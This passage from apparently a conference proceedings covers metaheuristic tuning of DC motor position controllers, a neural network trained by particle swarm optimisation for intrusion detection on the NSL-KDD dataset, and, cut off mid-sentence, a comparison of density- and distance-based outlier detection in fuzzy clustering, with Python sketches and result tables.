The F-PID controller is represented as PI^λ D^μ, where the integrator and the differentiator are of order λ and μ, respectively. One of the advantages of a fractional order
controller, as opposed to conventional PID, is that it can provide more adjustable
frequency and time responses in control system which helps get more robust perfor-
mance. One of the primary reasons for using fractional order controller is that it
can better control a system that allows to achieve stability more efficiently. Another
advantage is that it is less sensitive to changes in the parameters so it can provide
better results. F-PID controller produces output according to Eq. (4).

G = K_p + K_i/s^λ + K_d s^μ,   (μ, λ > 0)    (4)


4 Algorithms

4.1 Global Neighborhood Algorithm (GNA)

The global neighborhood algorithm was proposed by Alazzam in 2013 [15]. In this algorithm, the initial population is randomly generated and its fitness is calculated. The population is then ordered according to fitness, and the best solution is assigned as the global best solution. Next, a new population is created, in which the first 50% of the population is created in the neighbourhood of the global best solution, and the remaining 50% is randomly generated. Calculation of fitness and ordering according to fitness are done again. If the current best solution is better than the global best solution, then the current best solution becomes the global best solution, and this procedure continues until the iterations end.
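A compact Python sketch of this loop is given below; it is an interpretation of the description above, with the neighbourhood radius and search bounds as assumed parameters, and the objective would in this paper be the ITAE of Eq. (10).

```python
import numpy as np

def gna(objective, lower, upper, pop_size=40, iterations=20, radius=0.1):
    """Global neighborhood algorithm sketch: half the new population is drawn
    around the global best, the other half is generated randomly."""
    lower, upper = np.asarray(lower, float), np.asarray(upper, float)
    dim = len(lower)
    pop = np.random.uniform(lower, upper, (pop_size, dim))
    fitness = np.array([objective(p) for p in pop])
    g_best, g_fit = pop[fitness.argmin()].copy(), fitness.min()
    for _ in range(iterations):
        half = pop_size // 2
        near = g_best + radius * (upper - lower) * np.random.uniform(-1, 1, (half, dim))
        rand = np.random.uniform(lower, upper, (pop_size - half, dim))
        pop = np.clip(np.vstack([near, rand]), lower, upper)
        fitness = np.array([objective(p) for p in pop])
        if fitness.min() < g_fit:                       # keep the global best
            g_fit, g_best = fitness.min(), pop[fitness.argmin()].copy()
    return g_best, g_fit

# Example use: tune three PID gains in [0, 20] against some itae(gains) function.
# best_gains, best_cost = gna(itae, lower=[0, 0, 0], upper=[20, 20, 20])
```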

4.2 Bat Algorithm (BA)

It was developed by XS Yang [16]. Bats use echolocation to find their prey while
flying at the velocity vi and position pi . They use waves of frequency f and at a rate
ci and loudness L i . Initially, in the algorithm, population is generated with random
velocity and position. Then, their fitness value is evaluated. Next, the velocity and
position of population are updated according to Eqs. (5)–(7), where β takes a random
number between 0 and 1, and the best solution is denoted by p∗ . Next, a random
number is generated, and if it is greater than ci , a solution among the best solution
is selected, and a new solution is created according to Eq. (8), where the average
loudness of the bats is represented by L t , else generate a random solution. Again,
evaluate the fitness function, and a random number is generated. If new solution has
a better fitness than the fitness of the best solution with the generated random number
being less than the loudness for that bat, in that case, this solution is incorporated, and
pulse rate and loudness are updated according to Eq. (9), and this solution becomes
the best solution. Then repeat the process till the iteration count expires.
 
f_i = f_low + (f_high − f_low) β    (5)

v_i^t = v_i^(t−1) + (p_i^t − p*) f_i    (6)

p_i^t = p_i^(t−1) + v_i^t    (7)

p_new = p_old + ε L^t,  ε ∈ (−1, 1)    (8)

L_i^(t+1) = α L_i^t,  c_i^(t+1) = c_i^0 [1 − exp(−γ t)]    (9)
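The updates of Eqs. (5)–(9) can be arranged into the following sketch; the acceptance rule and search bounds follow the standard bat algorithm rather than any implementation detail not stated in the paper, and the objective is again a placeholder.

```python
import numpy as np

def bat_algorithm(objective, dim, n=40, iters=20, f_low=0.0, f_high=1.0,
                  alpha=0.5, gamma=0.5, lb=-5.0, ub=5.0):
    pos = np.random.uniform(lb, ub, (n, dim))
    vel = np.zeros((n, dim))
    loud = np.ones(n)                                  # L_i
    rate0 = np.random.rand(n)                          # c_i^0
    rate = np.zeros(n)
    fit = np.array([objective(p) for p in pos])
    best, best_fit = pos[fit.argmin()].copy(), fit.min()
    for t in range(1, iters + 1):
        for i in range(n):
            beta = np.random.rand()
            f_i = f_low + (f_high - f_low) * beta                  # Eq. (5)
            vel[i] = vel[i] + (pos[i] - best) * f_i                # Eq. (6)
            cand = np.clip(pos[i] + vel[i], lb, ub)                # Eq. (7)
            if np.random.rand() > rate[i]:                         # local search, Eq. (8)
                cand = np.clip(best + np.random.uniform(-1, 1, dim) * loud.mean(), lb, ub)
            cand_fit = objective(cand)
            if cand_fit < fit[i] and np.random.rand() < loud[i]:   # accept solution
                pos[i], fit[i] = cand, cand_fit
                loud[i] = alpha * loud[i]                          # Eq. (9)
                rate[i] = rate0[i] * (1 - np.exp(-gamma * t))
            if fit[i] < best_fit:
                best, best_fit = pos[i].copy(), fit[i]
    return best, best_fit

# Example: best, cost = bat_algorithm(lambda x: np.sum(x**2), dim=3)
```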

5 Objective Function Optimization

In this paper, the controller parameters have been determined and tuned using GNA and BA. The objective function used in this work to obtain the optimal values of these parameters is the integral time absolute error (ITAE); this is the function to be minimised. The expression for the ITAE is shown in Eq. (10)

ITAE = ∫_0^(t_ss) t |e(t)| dt    (10)
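Numerically, the ITAE can be evaluated from a simulated error signal, for example as in this short sketch, where t and y would come from a step-response simulation of the closed loop:

```python
import numpy as np

def itae(t, y, r=1.0):
    # Eq. (10): time-weighted absolute error, integrated by the trapezoidal rule.
    e = np.abs(r - y)
    return np.trapz(t * e, t)
```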

6 Simulation and Results

For BA and GNA, the population and iteration conditions were as follows:
Maximum population: 40, Maximum iteration: 20
BA parameters:
Maximum frequency: 1, Minimum frequency: 0, α: 0.5, γ : 0.5
The value of the controller parameters is as shown in Table 1.
The value of the transient response parameters for all the controllers tuned using
GNA and BA is shown in Table 2.
The transient response using GNA for controllers has been plotted in Fig. 2.

Table 1 Controller parameters


Algorithm Kp Ki Kd Ni μ λ
GNA PID 19.0882 0.0002 0.2196 – – –
GNA F-PID 18.515 0.0940 0.3619 – 0.8938 0.0145
GNA PID-N 19.9893 0 0.3318 239.799 – –
BAT PID 19.3879 0 0.1541 – – –
BAT F-PID 19.5178 0.6827 0.4535 – 0.8403 0.0083
BAT PID-N 19.4547 0 0.2926 226.322 – –
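As a rough cross-check of these values, the GNA-tuned PID-N loop can be rebuilt from the plant of Eq. (1) and the gains in Table 1. The sketch below assumes the python-control package rather than the authors' MATLAB/Simulink model, so the numbers it prints are only expected to be close to those in Table 2, not identical.

```python
import control as ct

# Plant of Eq. (1): angular displacement over armature voltage.
G = ct.tf([1.2], [0.00077, 0.0539, 1.441, 0])

# GNA PID-N gains from Table 1; the Ki/s term is omitted because Ki = 0.
Kp, Kd, N = 19.9893, 0.3318, 239.799
C = ct.tf([Kp], [1]) + ct.tf([Kd * N, 0], [1, N])     # Kp + Kd*N*s/(s + N)

T = ct.feedback(C * G, 1)                             # unity-feedback closed loop
info = ct.step_info(T)
print(info["RiseTime"], info["SettlingTime"], info["Overshoot"])
```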

Table 2 Transient parameters of DC motor position control
Algorithm    Rise time (s)    Settling time (s)    Overshoot (%)
GNA PID      0.0889           0.1961               2.1233
GNA F-PID    0.0821           0.1283               1.5558
GNA PID-N    0.0782           0.1262               0.1045
BAT PID      0.0829           0.2265               4.9593
BAT F-PID    0.0729           0.1815               4.2854
BAT PID-N    0.0802           0.1284               0.5336

Fig. 2 GNA response for DC motor position control (step input and step responses of PID, F-PID and PID-N; angular displacement in radians versus time in seconds)

Fig. 3 BA response for DC motor position control (step input and step responses of PID, F-PID and PID-N; angular displacement in radians versus time in seconds)

The transient response using BA for controllers has been plotted in Fig. 3.

7 Conclusion

In this paper, a comparative study of the transient response for PID, F-PID and PID-N
controllers was performed. The controller parameters were obtained and tuned using
GNA and BA. The response was plotted, and parameters like rise time, overshoot
(%) and settling time were obtained, and a comparison was done. It was found that F-
PID gave better performance over PID. Even though BA tuned F-PID gave slightly
better rise time compared to PID-N results for both BA and GNA, the overshoot
and settling time were very high. Hence, the PID-N controller gives the best overall
performance among the three. It was found that tuning of controllers using GNA
gave better overall performance compared to BA.

References

1. Neenu Thomas, D. P. P. (2009). Position control of DC motor using genetic algorithm based
PID controller. Proc World Congr Eng 2009
2. Aamir, M. (2013). On replacing PID controller with ANN controller for DC motor position
control. Int J Res Stud Comput, 2, 21–29. https://doi.org/10.5861/ijrsc.2013.236
3. Moran, M. E. F., & Viera, N. A. P. (2018). Comparative study for DC motor position controllers.
In 2017 IEEE 2nd Ecuador Tech Chapters Meet ETCM 2017 2017-Janua:1–6. https://doi.org/
10.1109/ETCM.2017.8247475
4. Flores-Morán, E., Yánez-Pazmiño, W., & Barzola-Monteses, J. (2018). Genetic algorithm and
fuzzy self-tuning PID for DC motor position controllers. Proc 2018 19th Int Carpathian Control
Conf ICCC 2018, 162–168. https://doi.org/10.1109/CarpathianCC.2018.8399621
5. Duman, S., Maden, D., & Güvenç, U. (2011). Determination of the PID controller parameters
for speed and position control of DC motor using gravitational search algorithm. In ELECO
2011—7th Int Conf Electr Electron Eng.
6. Dhieb, Y., Yaich, M., Guermazi, A., & Ghariani, M. (2019). PID controller tuning using ant
colony optimization for induction motor. J Electr Syst, 15, 133–141.
7. Manoj Kushwah PAP (2014) Tuning of PID controller for speed control of DC motor using
soft computing techniques—A review. Adv Electron Electr Eng, 4.
8. Allaoua, B., & Mebarki, B. (2012). Intelligent PID DC motor speed control alteration param-
eters using particle swarm optimization. Artif Intell Resour Control Autom Eng, 3–14. https://
doi.org/10.2174/978160805126711201010003
9. Meshram Rohit, P. M., & Kanojiya G. (2012). Method for speed control of DC Motor. Int Conf
Adv Eng Sci Manag, 117–122.
10. Das, K. R., Das, D., & Das, J. (2016). Optimal tuning of PID controller using GWO algorithm
for speed control in DC motor. Int Conf Soft Comput Tech Implementations, ICSCTI, 2015,
108–112. https://doi.org/10.1109/ICSCTI.2015.7489575
11. Jain, R. V. , & MVA, ASJ. (2016). Tuning of fractional order PID controller using particle
swarm optimization technique for DC motor speed control, 006, 6–9
12. Hekimoglu, B. (2019). Optimal Tuning of Fractional Order PID Controller for DC Motor Speed
Control via Chaotic Atom Search Optimization Algorithm. IEEE Access, 7, 38100–38114.
https://doi.org/10.1109/ACCESS.2019.2905961
13. Premkumar, K., & Manikandan, B. V. (2016). Bat algorithm optimized fuzzy PD based speed
controller for brushless direct current motor. Eng Sci Technol an Int J, 19, 818–840. https://
doi.org/10.1016/j.jestch.2015.11.004
14. Gozde, H., Taplamacioglu, M. C., & Ari, M. (2017). Simulation study for global neighborhood
algorithm based optimal automatic voltage regulator (AVR) system. In ICSG 2017—5th Int
Istanbul Smart Grids Cities Congr Fair (pp. 46–50). https://doi.org/10.1109/SGCF.2017.794
7634
15. Alazzam A. W. H. (2013). A new optimization algorithm for combinatorial problems. Int J
Adv Res Artif Intell, 2, 63–68. https://doi.org/10.14569/ijarai.2013.020510
16. Yang, X. S. (2010). A new metaheuristic Bat-inspired Algorithm. Stud Comput Intell, 284,
65–74. https://doi.org/10.1007/978-3-642-12538-6_6
A Hybrid Approach of ANN-PSO
Technique for Anomaly Detection

Sonika Dahiya, Priyansh Soni, Hridya Shiju Nadappattel, and Mohammad Fraz

Abstract In recent years, AI-based anomaly detection has attracted renewed interest, as the number and complexity of new breaches keep increasing; consequently, newer approaches that evolve to deal with these attacks are essential. We use artificial neural networks to devise a novel cyber intrusion detection method. While ANNs are popularly trained by back propagation and genetic algorithms, we propose the particle swarm optimisation method to help resolve issues such as a slow convergence rate and easily getting trapped in local minima, which arise with back propagation and genetic algorithms. The proposed approach utilises the standard NSL-KDD dataset used in the field of anomaly detection. The test results show that our strategy performs better than several existing approaches, including ANN-BP and ANN-GA, and gives accuracy in the range of 97–99%.

Keywords Artificial neural network · Particle swarm optimisation · Anomaly detection · NSL-KDD

1 Introduction

The recent years have seen a growing use of the internet, and with this, an increasing
number of intrusion attacks. In 2020, with the onset of the COVID-19 pandemic and
the sudden and urgent need to digitise and move to online methods of communi-
cation, the development of a model to battle these attacks is necessary. To combat
the attacks, multiple intrusion detection systems (IDSs) have been developed [1–3]
which monitor networks and record any malicious activities that are observed with
a security information system and an event managing system. Intrusion detection
systems are mainly categorised as [4].

S. Dahiya · P. Soni (B) · H. S. Nadappattel · M. Fraz
Delhi Technological University, Delhi, India

• network intrusion detection systems (NIDSs) are responsible for detecting those
malicious activities present in the network delivering incoming traffic.
• host-based intrusion detection systems (HIDSs) [5] are concerned with monitoring
the activities related to the files present on the operating system.

An IDS monitors the given traffic at a time and compares it to the attack informa-
tion already available, making it vital for high-security systems. On the detection of
certain anomalies, the IDS transmits an alert signal to the administrator. These are
some examples of anomalies:

• Forced break-ins, portrayed by the unusually high rate of password failure.


• Masquerading, successful break-ins with varied connections and location.
• Attacks by legitimate users, by routing data to devices not usually used, repeated
protocol violations, execution of unusual programmes, etc. [6].
• Viruses Attacks, categorised by their huge memory-requirements, disc space,
CPU-time, I/O activities, and a spike in the frequency of executable files rewritten
in the infected system.

It is essential to note that the development of a completely secure system is not


possible. There have been multiple works to improve IDS using supervised learning
methods, which make use of the labelled classes in the data-sets to classify attacks.
These have proven to be promising [7, 8]. Cryptography methods have also proven
to be highly effective due to their enormous parallelism [9, 10].
In this paper, the study proposes a supervised learning based model by integrating
artificial neural networks and particle swarm optimisation. The goal is to efficiently
find and classify anomalies, and thus, a much more precise detection model can be
obtained which increases the detection rate of an anomaly for the attacks that are
unknown to the IDS.
This study uses NSL-KDD data-set for training the proposed model. This research
work helps study how ANN, when trained with the PSO algorithm, can potentially
help to predict whether the given data corresponds to an anomaly.
Section 2 begins with the Related Work done in the past couple of years, specif-
ically in the field of intrusion detection with supervised learning. Section 3 talks
about the proposed Methodology and how the PSO has been used to train the ANN.
The fourth section describes the NSL-KDD [11] dataset and its pre-processing. This
section also briefs performance metrics. The fifth section describes the results in
detail and also discusses the impact of the various parameters of the algorithm on
the results.

2 Related Work

In a study by Kaliappan Jeyakumar, Thiagarajan Revathi, and Sundararajan Karpagam


et al. [12], the multi-layer Perceptron, is used on the KDD Cup 99 Dataset [13], a
well-known standard dataset for anomaly detection systems [14].

The KDD Cup 99 dataset is based on DARPA'98, which has not been widely appreciated, as shown by McHugh [15]. The simulated attack types fall under the categories Denial of Service attacks (DoS), User to Root attacks (U2R), Remote to Local attacks (R2L) and Probing attacks (Probe).
A three-layer MLP was set up for this research. One of the metrics used, accuracy, ranged from 87.2% for the normal class, while the highest accuracy achieved was 99.84% for U2R. Although the result achieved for U2R is high, the accuracies for the other categories vary greatly, from 92.31% for R2L and 94.2% for Probe to 96.69% for DoS, and an approach is needed to bring them into the same range for better reliability.
In the studies performed by Taher, Yasin Jisan, Rahman, 2019 [16], various
machine learning algorithms were compared against each other with a focus on com-
paring the two specific supervised methods—Artificial Neural Network and Support
Vector Machine.
In this study, artificial neural network was trained with Backpropagation, which
improves the output by taking into account error on each pass. SVM, specifies a
hyperplane that defines the characteristics of classifiers and can be used for classifi-
cation, and is also helpful in the detection of outliers.
The two algorithms were compared using criteria of accuracy. The dataset used
to work on the intrusion detection problem was the NSL-KDD [17] dataset. It is
observed that ANN detects anomalies at a higher percentage of accuracy than SVM
and also has a higher stance in comparison with pre-existing models.
In another study conducted by Latah, Majd, Tokerd, 2018 [18], various super-
vised learning techniques, namely, Naive Bayes (NB), decision trees (DT), random
forest (RT), extreme learning machine (ELM), support vector machines (SVMs),
K nearest-neighbor (KNN), neural networks (NNs), linear discriminant analysis
(LDA), AdaBoost, RUSBoost, BaggingTrees, and LogitBoost were implemented
and compared against each other. The principal component analysis (PCA) method
was utilised for feature selection.
Through the study, it was observed that decision tree-based approach showed
optimum performance in terms of the accuracy, whereas the bagging and boost-
ing performed better than K-nearest neighbors (KNNs), extreme learning machine
(ELM), artificial neural networks (ANNs), support vector machines (SVM), linear
discriminant analysis (LDA), and random forest (RT).
Through these results, it can be gathered that many improvements have been
made available and many more can be made in using supervised measures to detect
anomalies with a good enough accuracy.

3 Proposed Method

Particle Swarm Optimisation Particle swarm optimisation is a robust optimisation


and evolutionary technique; a swarm of n particles communicate with one another
using search optimised directions and determine a global optimum. In each iteration
of the algorithm, the location and position of each particle are updated as per its
previous knowledge, its experience, and the experience of its neighbours.
A particle is composed of 3 vectors: current location and/or position of the particle
(x-vector), the position of the best solution (p-best), a gradient for which particle will
travel if not updated (v-vector). All the particles are moved towards the best location
found by an individual so far (personal best) and the global best position (global
best) obtained so far by all particles which is done by adding the velocity-vector to
the position-vector to get another position-vector.

new_X_i = X_i + V_i    (1)

When the particle has calculated new_X_i, it then moves to this new position. If the new fitness is better than the p_best fitness, then

p_best = new_X_i and p_best_fitness = new_X_i_fitness.    (2)

Using the PSO Algorithm to Train ANN This study uses PSO as a method to train [19] the network and to optimise its weights and biases. This is done by creating a swarm whose dimension equals the number of weights and biases, achieved by using an n-dimensional array; the weights and biases are retrieved from this array when they are fed back into the network. Each of these particles therefore represents an individual neural network. To compute the error between the predictions and the ground-truth values, the negative log-likelihood is used. Figure 1 describes the ANN-PSO algorithm.
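A minimal sketch of this training scheme is shown below; it is not the authors' implementation. The inertia weight w and the acceleration coefficients c1, c2 are standard PSO choices that the paper does not specify, and the network is a single-hidden-layer binary classifier whose default sizes echo the parameter study in Sect. 4.3.

```python
import numpy as np

def unpack(vec, n_in, n_hid):
    """Split a flat particle into W1, b1, w2, b2 for a binary classifier."""
    i = 0
    W1 = vec[i:i + n_in * n_hid].reshape(n_in, n_hid); i += n_in * n_hid
    b1 = vec[i:i + n_hid]; i += n_hid
    w2 = vec[i:i + n_hid]; i += n_hid
    return W1, b1, w2, vec[i]

def forward(vec, X, n_hid):
    W1, b1, w2, b2 = unpack(vec, X.shape[1], n_hid)
    h = np.tanh(X @ W1 + b1)
    return 1.0 / (1.0 + np.exp(-(h @ w2 + b2)))        # anomaly probability

def nll(vec, X, y, n_hid):
    # Negative log-likelihood between predictions and ground-truth labels.
    p = np.clip(forward(vec, X, n_hid), 1e-9, 1 - 1e-9)
    return -np.mean(y * np.log(p) + (1 - y) * np.log(1 - p))

def train_ann_pso(X, y, n_hid=50, n_particles=75, iters=200, w=0.7, c1=1.5, c2=1.5):
    dim = X.shape[1] * n_hid + 2 * n_hid + 1            # one particle = one network
    pos = np.random.uniform(-1, 1, (n_particles, dim))
    vel = np.zeros_like(pos)
    pbest = pos.copy()
    pbest_fit = np.array([nll(p, X, y, n_hid) for p in pos])
    gbest = pbest[pbest_fit.argmin()].copy()
    for _ in range(iters):
        r1, r2 = np.random.rand(*pos.shape), np.random.rand(*pos.shape)
        vel = w * vel + c1 * r1 * (pbest - pos) + c2 * r2 * (gbest - pos)
        pos = pos + vel                                  # Eq. (1)
        fit = np.array([nll(p, X, y, n_hid) for p in pos])
        improved = fit < pbest_fit                       # Eq. (2)
        pbest[improved], pbest_fit[improved] = pos[improved], fit[improved]
        gbest = pbest[pbest_fit.argmin()].copy()
    return gbest

# Example: predictions = forward(train_ann_pso(X_train, y_train), X_test, n_hid=50) > 0.5
```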

4 Result and Analysis

The entire codebase of the algorithm was written in Python. Google Colab was used with the following hardware specification: GPU: 1x Tesla K80 (compute capability 3.7, 2496 CUDA cores); CPU: 1x single-core hyper-threaded Xeon processor @ 2.3 GHz (1 core, 2 threads); RAM: 12.6 GB available.

4.1 Dataset

There are many datasets available for intrusion detection systems, some examples
being - DARPA98, KDDCup99, CAIDA, NSL-KDD, ISCX 2012, ADFA-LD and
ADFA-WD and CICIDS 2017 [20]. Among these datasets, NSL-KDD dataset [17]
has been relied upon by many research works to be consistent and duly representing
real-time network traffic [14]. Hence, this is the dataset used in this research work.
It is derived from KDDCup [11] to eliminate the issues in the original KDDCup
dataset which lead to faulty performance of anomaly detection methods. The main

Fig. 1 The ANN-PSO algorithm

criticism revolves around the non-familiarity of the traffic to real data networks,
no exact definition of attacks, and so on [13]. In these, the labelled attacks can be
classified into four subdivisions:
• denial of service attacks (DoS) take over a particular system and shuts down traffic
to and from the system, causing a large influx in the traffic, more than system
capacity, leading to the system shutting down.
• Probe attacks, also known as surveillance attacks, steal sensitive information.
• Users to Root attacks (U2R) attempt to exploit weaknesses in a system to gain
access to the network as a super-user for root access to that network.
• Remote to Local attacks (R2L) access a remote machine without access to the
local network which compromises network from a remote machine.
The labels of all the attacks mentioned in the KDD data-sets were successfully
categorised according to the four intrusion attack classes. Table 1 contains attacks
and percentages of each attack recorded.

Table 1 Kinds of attacks and their subset category along with percentage in the datasets
Attacks Label KDDTrain+ KDDTest+
DoS Neptune, teardrop, 47420 (37.64%) 7533 (33.41%)
nmap, smurf, pod,
back, land, udpstorm,
worm, apache2,
mailbomb,
processtable
Probe Ipsweep, portsweep, 10163 (8.07%) 2348 (10.41%)
saint, satan, mscan
U2R xterm, perl, rootkit, 52 (0.04%) 67 (0.31%)
buffer_overflow,
loadmodule, sqlattack,
ps
R2L xlock, warezclient, 995 (0.79%) 2885 (12.90%)
guess_passwd,
snmpguess, ftp_write,
phf, warezmaster,
multihop, imap, spy,
sendmail, httptunnel,
named, snoop,
snmpgetattack

Table 2 The subsets in training and testing datasets


Attacks Train_ Test_ Train_ Test_ Train_ Test_ Train_ Test_ Train_ Test_
DoS DoS Probe Probe U2R U2R R2L R2L Mixed Mixed
Normal 2000 2000 2000 2000 2000 2000 2000 2000 2000 9000
DoS 100 100 0 0 0 0 0 0 100 100
Probe 0 0 100 100 0 0 0 0 100 100
U2R 0 0 0 0 50 50 0 0 50 50
R2L 0 0 0 0 0 0 50 50 50 50
2100 2100 2100 2100 2050 2050 2050 2050 9300 9300

Preprocessing of Data-Set The datasets are preprocessed using one-hot encoding to change categorical values into a binary encoded form. This increases the number of features from the initial 42 to 123. The features undergoing one-hot encoding are Protocol Type, Service and Flag. After encoding these features, class labels were created and encoded. We split the datasets into five subsets: DoS, Probe, U2R, R2L and Mixed, as shown in Table 2.
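A short pandas sketch of this encoding step is given below; the file name and the assumption that the CSV already carries NSL-KDD column headers ('protocol_type', 'service', 'flag', 'label') are ours, not taken from the original implementation.

```python
import pandas as pd

df = pd.read_csv("nsl_kdd_train.csv")                          # assumed to have headers

# One-hot encode the three categorical features described in the text.
df = pd.get_dummies(df, columns=["protocol_type", "service", "flag"])

# Binarise the class label: 1 = anomaly, 0 = normal traffic.
df["label"] = (df["label"] != "normal").astype(int)

X = df.drop(columns=["label"]).to_numpy(dtype=float)
y = df["label"].to_numpy()
```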

4.2 Performance Metrics

Accuracy is used as the performance measure for our model, where accuracy is given by the number of correct predictions divided by all of the predictions made.

Accuracy = (TP + TN) / (TP + FP + FN + TN)    (3)

The numerator specifies the right predictions (True positives and True Negatives),
whereas, the denominator describes all the predictions by the algorithm. To measure
the performance, the confusion matrix is used.

4.3 Analysis

The results obtained for each of these subsets are discussed below with comparison
with the various optimisation parameters, focusing on number of particles versus
accuracy and best cost, number of iterations versus accuracy and best cost, number
of hidden neurons versus accuracy and best cost.
In the graph shown in Fig. 2, increasing the number of particles to 500 causes the accuracy to improve from 95 to 98%, with similar performance towards the end of the curve. With respect to the change in best cost with an increase in particles in Fig. 3, the best cost reduces as we increase the particles and reaches a constant value.
The graph in Fig. 4 shows that the accuracy for all the attack types consistently increases from 95% and reaches its peak at 98% as we increase the iterations to 200. All the subsets show similar behaviour as we increase the iterations and eventually become constant. In Fig. 5, the best cost reduces as we increase the iterations; exhibiting similar behaviour, it reaches a constant value after a certain number of iterations, and the performance of the model does not change thereafter.

Fig. 2 Graph studying the comparison between the particles and accuracy

Fig. 3 Graph studying the comparison between the particles and best cost

Fig. 4 Graph studying the comparison between iterations and accuracy

Fig. 5 Graph studying the comparison between iterations and best cost

Fig. 6 Graph studying the comparison between the hidden neurons and accuracy

Fig. 7 Graph studying the comparison between the hidden neurons and best cost

The graph in Fig. 6 shows that the accuracy increases until 50 hidden neurons,
and thereafter, reaches a constant value. Similarly, for the graph in Fig. 7, the cost
reduces to 50 hidden neurons and then it gets saturated.

5 Conclusion

Through this paper, we presented the supervised learning model of artificial neural
networks coupled with particle swarm optimisation, which is used for training the
algorithm, to detect unknown anomaly attacks. The algorithm was tested using the
standard public dataset NSL-KDD. The experimental results, and a comparison with similar studies conducted in the field of intrusion detection with supervised learning, show that our model is more reliable, as the accuracies obtained for the various subdivisions of the dataset, namely DoS, Probe, R2L, U2R and Mixed, range from 97 to 99% with very slight deviation.

There are optimum parameters that can be set to get best results using the ANN-
PSO algorithm, indicating that the fixed parameters used during the algorithm impacts
the performance metrics. Using 50 particles or more gives the best accuracy; and the
optimal accuracy is obtained at 75 particles. The number of hidden neurons are
typically varying across the subdivisions but using 75–150 hidden neurons shows
maximum accuracy. The marginal increase in accuracy while further changing the
parameters of the algorithm proves that the ANN-PSO model is consistent.

Comparison of Density-Based
and Distance-Based Outlier Identification
Methods in Fuzzy Clustering

Anjana Gosain and Sonika Dahiya

Abstract Outlier identification is a process of identifying any kind of abnormality in
the data with regard to the context or behavior of data objects. In the literature, various
outlier identification methods such as statistical methods, clustering-based methods,
and proximity-based methods have been proposed. However, in fuzzy clustering,
mainly proximity-based methods (density-based and distance-based) are used for
outlier identification. In this paper, we have compared a density-based outlier iden-
tification method and a distance-based outlier identification method in the context of
fuzzy clustering. Experimental results of these outlier identification methods show
higher stability and accuracy of the distance-based method over the density-based method.

Keywords Outlier identification · Fuzzy clustering · FCM · DOFCM · DBKIFCM

1 Introduction

An outlier is basically any kind of abnormality in the data regarding the behavior or
context of data objects, which makes its study vastly important [1, 2]. Outlier iden-
tification is a major research area in data mining as it is very effective in fraud
detection, network intrusion detection, activity monitoring, surveillance, and many
such activities/applications [3, 4].
Outlier identification methods have been put in different categories based on
different paradigms, as shown in Fig. 1. Statistical methods are based on some statis-
tical model, and any object that fails to follow the statistical model is identified
as an outlier. This method works well for applications like intrusion detection and
fraud detection where objects follow some statistical model, but for applications like
medical images, this method does not perform well. Clustering-based methods work
on various clustering approaches and are effective for areas where grouping is to be

A. Gosain
USICT, GGSIP University, Delhi, India
S. Dahiya (B)
Delhi Technological University, Delhi, India


Fig. 1 Classification of outlier detection methods: statistical (or model-based) methods, further divided into parametric and non-parametric methods; clustering-based methods; and proximity-based methods, further divided into distance-based and density-based methods

formed. However, clustering is a very expensive mining operation. Proximity-based
methods work on the proximity of the data objects to their neighbors, and these methods
are used in most applications. In fuzzy clustering also, mainly proximity-based
methods have been used for outlier identification.
Fuzzy clustering is the process of partitioning data objects into groups called clusters,
but this partition is not crisp, as the membership of a data object to any given cluster
varies from zero to one. Fuzzy cluster analysis has wide application in domains such
as astronomy, image segmentation, and medical imaging for various applications
like object recognition, customer segmentation, pattern recognition, etc. In the literature,
many fuzzy clustering techniques have been proposed [5–9], but for outlier identifica-
tion mainly density-based methods [10] and distance-based methods [10] have been
used. The density-based method (DO) [10–12] introduced neighborhood membership,
based on the density of data objects within a neighborhood radius, where the neighbor-
hood membership of an outlier is relatively much lower than that of non-outliers. However,
DO has certain drawbacks: (1) it concentrates solely on local outliers, (2) it is susceptible
to the choice of threshold value, and (3) it does not converge well on a threshold value.
DB overcomes these drawbacks of DO by using the concept of k-nearest neighbors
and considering that if the distance of the kth nearest neighbor to a data object is greater
than a calculated distance (rspatium), then that data object is an outlier.
In this paper, we have compared these two outlier identification algorithms, DO and
DB, on standard datasets: D12, D15, D115, and the Bensaid dataset. Results are
represented using figures, tables, and histograms, and it is observed that DB focuses
on global outliers whereas DO focuses on local outliers, and that DB outperforms
DO in various aspects.
The organization of the paper is as follows: a brief description of the density-oriented (DO)
and distance-based (DB) approaches of outlier identification in Sect. 2, DO vs DB in
Sect. 3, followed by the conclusion in Sect. 4.

2 Density-Oriented (DO) and Distance-Based (DB)


Approach of Outlier Identification in Context of Fuzzy
Clustering

2.1 Density-Oriented Approach [10–12]

A density-based outlier detection method considers the density of a data object and
its neighbors. A data object is spotted as an outlier if its density is comparatively far
poorer than that of its neighbors [10].
Based on this concept of density-based outlier, a variation density-based outlier
method, DO, is proposed by P. Kaur and A. Gosain in 2010 [11, 12]. In DO, outlier
identification is done by presenting a new term, neighborhood membership, which
is defined as follows:

M^{i}_{neighborhood}(X) = \frac{\eta^{i}_{neighborhood}}{\eta_{max}}   (1)

where \eta^{i}_{neighborhood} is the number of data objects in the neighborhood of data object x_i and \eta_{max} = \max_{i=1,\ldots,n}(\eta^{i}_{neighborhood}). Any data object x_j is said to be in the neighborhood of x_i only if it fulfills the following condition:

p \in X,\; i \in X \mid dist(p, i) \le r_{neighborhood}   (2)

where dist(p, i) is the Euclidean distance between 'i' and 'p', and r_{neighborhood} is the neighborhood radius. Outliers are pinpointed using the following equation after tuning a threshold value \alpha for M^{i}_{neighborhood}:

M^{i}_{neighborhood} \begin{cases} < \alpha, & \text{outlier} \\ \ge \alpha, & \text{non-outlier} \end{cases} \quad \forall i \in [1, \ldots, n]   (3)
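
A minimal NumPy sketch of Eqs. (1)–(3) is given below for illustration; it is not the code of [11, 12], and the toy data, the neighborhood radius, and the threshold value are assumptions. Counting a point as its own neighbour (distance zero) is a convention adopted here so that eta_max is never zero.

import numpy as np

def do_outliers(X, r_neighborhood, alpha):
    # Density-oriented (DO) outlier flags following Eqs. (1)-(3):
    # a point is an outlier if its neighborhood membership falls below alpha.
    diff = X[:, None, :] - X[None, :, :]
    dist = np.sqrt((diff ** 2).sum(axis=-1))          # pairwise Euclidean distances
    eta = (dist <= r_neighborhood).sum(axis=1)        # objects within the radius (self included)
    membership = eta / eta.max()                      # Eq. (1): M_i = eta_i / eta_max
    return membership < alpha                         # Eq. (3): True marks an outlier

# Toy usage: two dense clusters plus one isolated point.
X = np.vstack([np.random.randn(20, 2), np.random.randn(20, 2) + 8, [[30.0, 30.0]]])
print(do_outliers(X, r_neighborhood=2.0, alpha=0.1))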

2.2 Distance-Based Approach [10, 13]

A distance-based outlier detection method checks the neighborhood of a data object,
which is expressed using a user-given radius. A data object is categorized as an outlier
if its neighborhood does not have enough other data objects. For each object x_i, count
the number of other objects in its r-neighborhood. If most of the objects in X are far
from x_i, then x_i is an outlier. Mathematically, an object x_i is a distance-based outlier
if:

